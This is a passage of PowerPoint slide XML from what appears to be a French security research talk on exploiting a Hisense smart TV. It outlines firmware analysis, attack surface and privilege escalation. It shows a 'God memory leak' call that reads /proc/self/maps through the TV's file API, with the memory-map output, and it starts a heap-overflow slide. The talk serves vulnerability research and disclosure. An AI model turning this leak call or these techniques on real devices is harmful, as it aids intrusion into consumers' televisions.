          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1497115"/>
            <a:ext cx="3940815" cy="3278085"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le produit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Source d’informations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>UART</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Résultats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque réseau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque logicielle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Vulnérabilités</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Elévation de privilèges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Stratégie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BigBang</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>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Espace réservé du contenu 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5901F7-D99A-9E0E-0A66-A9EA63155327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688973" y="1428560"/>
            <a:ext cx="3940815" cy="3278085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst/>
              <a:defRPr sz="1400" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="447675" marR="0" indent="-200025" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst/>
              <a:defRPr sz="1100" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>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mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Navigateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rappels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Stratégie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372261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84BC273-3D9C-B9D5-5277-B9B13E57FB3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18CB2FFE-26BC-6A34-EE5B-FE48DC3C1EA2}"/>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336F1804-378E-5FB0-AA2F-E62022A931B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>God</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>leak</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C87E4AC-40FF-AF5A-CD17-C4E18920982C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631184" y="1228795"/>
            <a:ext cx="7926075" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hisense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file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downloadAsync</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"file:///proc/self/maps"</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"toto"</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1</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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br>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</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hisense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file</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read</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"toto"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{370FE95F-8C05-A5DC-133B-424C5A0CD80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905821" y="1897197"/>
            <a:ext cx="7598416" cy="1940083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>00008000-02683000 r-</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xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 00000000 b3:1c 6684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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/local/opt/</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r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/</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0268b000-0268f000 r--p 0267b000 b3:1c 6684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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/local/opt/</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r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/</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0268f000-0269c000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-p 0267f000 b3:1c 6684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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/local/opt/</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r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/</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0269c000-026b8000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-p 00000000 00:00 0</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026bb000-02d8b000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-p 0268b000 b3:1c 6684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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/local/opt/</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r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/</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hisenseUI</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0380c000-0391c000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-p 00000000 00:00 0          [heap]</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20000000-20001000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-s 00000000 00:06 57         /dev/fusion0</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>20010000-20112000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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-s 00000000 00:0f 162        /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/fusion.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>be6fb000-be71c000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rwxp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 00000000 00:00 0          [stack]</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{145E2892-E21F-63CC-8306-B50BE1C9F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301" y="1752015"/>
            <a:ext cx="3291840" cy="2523744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DCED3C-8A1A-F93B-787E-E893F73BFB12}"/>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3" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240E2F99-6D58-56B0-2FF9-DA4C948DAFA8}"/>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19284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5291DEC-382C-D264-5F76-1EED9D4E7534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35DC89CA-09EB-2311-7E2C-32E3A70956C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1174B9B7-ADAF-8698-128C-8046CBD63080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DCA0F2-36D9-E3C5-7F8B-24C2DE2ABD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1202363"/>
            <a:ext cx="8147689" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fastcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00000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Zint_Create_QrCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
